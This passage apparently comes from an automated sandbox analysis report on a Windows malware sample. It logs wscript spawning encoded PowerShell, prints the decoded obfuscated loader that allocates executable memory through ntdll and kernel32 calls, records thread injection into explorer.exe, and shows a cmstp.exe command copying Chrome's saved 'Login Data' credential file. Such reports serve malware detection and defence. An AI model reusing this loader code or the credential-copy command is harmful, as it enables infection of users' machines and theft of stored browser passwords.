Test-Path "Baneberrie2" $bidrags2="$env:temp" + "\FORSVARL.dat"#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVI
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class bidrags1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);}"@#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr Test-Path "objekt" Test-Path "FOLKE" $bidrags3=0;$bidrags9=1048576;$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme Test-Path "Baneberrie2" $bidrags2="$env:temp" + "\FORSVARL.dat"#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVIJump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3440Jump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 6392Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"Jump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000022.00000000.755846261.0000000004532000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.676433392.0000000004534000.00000004.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000016.00000000.527886714.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.585187723.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.578176779.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.566378249.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.554958634.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525253888.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574481518.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.549317340.00000000008B8000.00000004.00000020.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.715392182.0000000005120000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.758084456.0000000005120000.00000004.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmpBinary or memory string: vProgram Manager
      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
      Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000022.00000000.702018769.00000000005F7000.00000004.00000020.sdmp, explorer.exe, 00000022.00000000.753310066.00000000005F7000.00000004.00000020.sdmpBinary or memory string: ProgmanS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
